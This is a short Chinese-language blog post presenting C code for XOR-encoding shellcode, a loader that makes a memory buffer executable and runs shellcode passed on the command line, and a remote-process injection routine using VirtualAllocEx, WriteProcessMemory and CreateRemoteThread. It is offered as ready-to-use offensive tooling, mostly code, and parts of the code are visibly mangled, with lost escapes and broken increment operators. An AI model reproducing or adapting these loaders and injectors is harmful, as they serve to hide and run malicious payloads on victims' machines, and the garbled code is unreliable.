C/C++ ShellCode 常用加密方式

2022-12-28 17:26:25 浏览数 (2)

异或加密ShellCode:

代码语言:javascript复制
#include <stdio.h>
#include <Windows.h>

unsigned char buf[] = "xbaxa9xb0x07x68xddxc3xd9x74x24xf4x5ex31xc9xb1";

int main(int argc, char* argv[])
{
	int password = 1025;
	unsigned char enShellCode[500];
	unsigned char deShellCode[500];
	int nLen = sizeof(buf)-1;

	for (int i = 0; i<nLen; i  )
	{
		enShellCode[i] = buf[i] ^ password;
		printf("\x%x", enShellCode[i]);
	}

	printf("n");

	for (int i = 0; i<nLen; i  )
	{
		deShellCode[i] = enShellCode[i] ^ password;
		printf("\x%x", deShellCode[i]);
	}

	system("pause");
	return 0;
}

另一种ShellCode加密方式

代码语言:javascript复制
#include <stdio.h>
#include <Windows.h>

char ShellCode[] = "xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C";

void encoder(char* input, unsigned char key)
{
	int i = 0, len = 0;
	FILE * fp;
	unsigned char * output;
	len = strlen(input);
	output = (unsigned char *)malloc(len   1);

	for (i = 0; i<len; i  )
		output[i] = input[i] ^ key;

	fp = fopen("shellcode.raw", "w ");
	fprintf(fp, """);
	for (i = 0; i<len; i  )
	{
		fprintf(fp, "\x%0.2x", output[i]);
		if ((i   1) % 16 == 0)
			fprintf(fp, ""n"");
	}
	fprintf(fp, "";");
	fclose(fp);

	// 输出加密后的文件
	for (i = 0; i<len; i  )
	{
		printf("%0.2x ", output[i]);
		if ((i   1) % 16 == 0)
		{
			printf("n");
		}
	}
	free(output);
}

int main(int argc,char *argv[])
{
	encoder(ShellCode, 1233);

	system("pause");
	return 0;
}

ShellCode代码执行盒

代码语言:javascript复制
#include <stdio.h>
#include <Windows.h>

int main(int argc, char *argv[])
{
	unsigned int char_in_hex;

	char *shellcode = argv[1];
	unsigned int iterations = strlen(shellcode);

	unsigned int memory_allocation = strlen(shellcode) / 2;

	for (unsigned int i = 0; i< iterations - 1; i  )
	{
		sscanf(shellcode   2 * i, "%2X", &char_in_hex);
		shellcode[i] = (char)char_in_hex;
	}

	void *exec = VirtualAlloc(0, memory_allocation, MEM_COMMIT, PAGE_READWRITE);
	memcpy(exec, shellcode, memory_allocation);
	DWORD ignore;
	VirtualProtect(exec, memory_allocation, PAGE_EXECUTE, &ignore);
	(*(void(*)()) exec)();

	return 0;
}

ShellCOde 进程注入

代码语言:javascript复制
#include <stdio.h>
#include <windows.h>

unsigned char ShellCode[] = "shellcode代码";

BOOL InjectShellCode(int Pid)
{
	HANDLE Handle, remoteThread;
	PVOID remoteBuffer;

	Handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);

	remoteBuffer = VirtualAllocEx(Handle, NULL, sizeof(ShellCode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(Handle, remoteBuffer, ShellCode, sizeof(ShellCode), NULL);
	remoteThread = CreateRemoteThread(Handle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
	CloseHandle(Handle);
}

int main(int argc, char *argv[])
{
	InjectShellCode(1024);
	return 0;
}

0 人点赞